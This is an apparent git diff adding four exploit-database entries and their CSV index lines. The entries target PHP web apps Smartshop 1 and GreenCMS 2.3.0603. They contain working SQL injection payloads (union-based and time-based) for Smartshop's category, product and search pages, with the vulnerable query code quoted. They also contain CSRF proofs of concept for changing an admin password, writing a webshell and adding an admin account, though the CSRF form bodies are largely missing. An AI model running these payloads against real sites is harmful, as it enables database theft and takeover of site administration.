diff --git a/exploits/php/webapps/44823.txt b/exploits/php/webapps/44823.txt new file mode 100644 index 000000000..51085cb63 --- /dev/null +++ b/exploits/php/webapps/44823.txt @@ -0,0 +1,60 @@ +# Exploit Title: Smartshop 1 - SQL Injection +# Date: 2018-06-02 +# Exploit Author: L0RD or borna.nematzadeh123@gmail.com +# Software Link: https://github.com/smakosh/Smartshop/archive/master.zip +# Vendor Homepage: https://www.behance.net/gallery/49080415/Smartshop-Free-e-commerce-website +# Version: 1 +# Tested on: Kali linux +================================================= +# Description : +Smartshop 1 suffers from sql injection which attacker can inject sql +commands . +================================================= +# POC : SQLi + +# vulnerable files : [ category.php , product.php , search.php ] + +1) category.php : +# Parameter : id +# Type : Union based +# Payload : ' UNION SELECT 1,user(),3,4,5%23 + +# Vulnerable code : + +$id_category =$_GET['id']; +$start = ($page > 1) ? ($page * $perpage) - $perpage : 0; +$queryproduct = "SELECT SQL_CALC_FOUND_ROWS id, name, price, id_picture, +thumbnail FROM product WHERE id_category = '{$id_category}' ORDER BY id +DESC LIMIT {$start}, 16"; +$result = $connection->query($queryproduct); + +================================================= + +2) product.php : +# Parameter : id +# Type : Union based +# Payload : ' UNION SELECT 1,user(),database(),4,5,6%23 + +# Vulnerable code : + +$id_product =$_GET['id']; +$queryproduct = "SELECT id, name, price, description, id_picture, thumbnail + FROM product WHERE id = '{$id_product}'"; +$result1 = $connection->query($queryproduct); + +================================================= + +3) search.php : +# Parameter : searched +# Type : Time-based blind +# Payload : ' AND SLEEP(10)%23 + +# Vulnerable code : + +$word = $_GET['searched']; +$queryproduct = "SELECT SQL_CALC_FOUND_ROWS id, name, price, id_picture, +thumbnail FROM product WHERE name LIKE '%{$word}%' ORDER BY id DESC LIMIT +{$start}, 16"; +$result = $connection->query($queryproduct); + +================================================= \ No newline at end of file diff --git a/exploits/php/webapps/44824.html b/exploits/php/webapps/44824.html new file mode 100644 index 000000000..f12efb143 --- /dev/null +++ b/exploits/php/webapps/44824.html @@ -0,0 +1,31 @@ +# Exploit Title: Smartshop 1 - Cross site request forgery +# Date: 2018-06-02 +# Exploit Author: L0RD or borna.nematzadeh123@gmail.com +# Software Link: https://github.com/smakosh/Smartshop/archive/master.zip +# Vendor Homepage: https://www.behance.net/gallery/49080415/Smartshop-Free-e-commerce-website +# Version: 1 +# Tested on: Kali linux +================================================= + +# POC : CSRF + +# Exploit : +# vulnerable file : editprofile.php + + + + Change admin password + + +
+ + + +
+ + + + +================================================== \ No newline at end of file diff --git a/exploits/php/webapps/44825.html b/exploits/php/webapps/44825.html new file mode 100644 index 000000000..746bb74de --- /dev/null +++ b/exploits/php/webapps/44825.html @@ -0,0 +1,33 @@ +# Exploit Title: GreenCMS v2.3.0603 CSRF vulnerability get webshell +# Date: 2018-06-02 +# Exploit Author: xichao +# Vendor Homepage: https://github.com/GreenCMS/GreenCMS +# Software Link: https://github.com/GreenCMS/GreenCMS +# Version: v2.3.0603 +# CVE : CVE-2018-11670 + +An issue was discovered in GreenCMS v2.3.0603. There is a CSRF vulnerability that +allows attackers to execute arbitrary PHP code via the content parameter to index.php?m=admin&c=media&a=fileconnect. + +poc: + + + + + + csrftest + +
+ + + +  + +
+ + + +References: +http://www.iwantacve.cn/index.php/archives/38/ +http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11670 +https://github.com/GreenCMS/GreenCMS/issues/108 \ No newline at end of file diff --git a/exploits/php/webapps/44826.html b/exploits/php/webapps/44826.html new file mode 100644 index 000000000..7946a847e --- /dev/null +++ b/exploits/php/webapps/44826.html @@ -0,0 +1,39 @@ +# Exploit Title: GreenCMS v2.3.0603 CSRF vulnerability add admin +# Date: 2018-06-02 +# Exploit Author: xichao +# Vendor Homepage: https://github.com/GreenCMS/GreenCMS +# Software Link: https://github.com/GreenCMS/GreenCMS +# Version: v2.3.0603 +# CVE : CVE-2018-11671 + +An issue was discovered in GreenCMS v2.3.0603. There is a CSRF vulnerability that can add an admin account via index.php?m=admin&c=access&a=adduserhandle. + +poc: + + + + + + csrftest + +   +     
+         +         +         +         +         +         +         +         +         +         + +      
+ + + +References: +http://www.iwantacve.cn/index.php/archives/39/ +http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11671 +https://github.com/GreenCMS/GreenCMS/issues/109 \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 202c4d198..b63bf164b 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -39487,3 +39487,7 @@ id,file,description,date,author,type,platform,port 44814,exploits/php/webapps/44814.txt,"PHP Dashboards NEW 5.5 - 'email' SQL Injection",2018-05-31,"Kağan Çapar",webapps,php, 44815,exploits/php/webapps/44815.txt,"CSV Import & Export 1.1.0 - SQL Injection / Cross-Site Scripting",2018-05-31,"Kağan Çapar",webapps,php, 44816,exploits/php/webapps/44816.txt,"Grid Pro Big Data 1.0 - SQL Injection",2018-05-31,"Kağan Çapar",webapps,php, +44823,exploits/php/webapps/44823.txt,"Smartshop 1 - 'id' SQL Injection",2018-06-03,L0RD,webapps,php, +44824,exploits/php/webapps/44824.html,"Smartshop 1 - Cross-Site Request Forgery",2018-06-03,L0RD,webapps,php, +44825,exploits/php/webapps/44825.html,"GreenCMS 2.3.0603 - Cross-Site Request Forgery / Remote Code Execution",2018-06-03,longer,webapps,php, +44826,exploits/php/webapps/44826.html,"GreenCMS 2.3.0603 - Cross-Site Request Forgery (Add Admin)",2018-06-03,longer,webapps,php,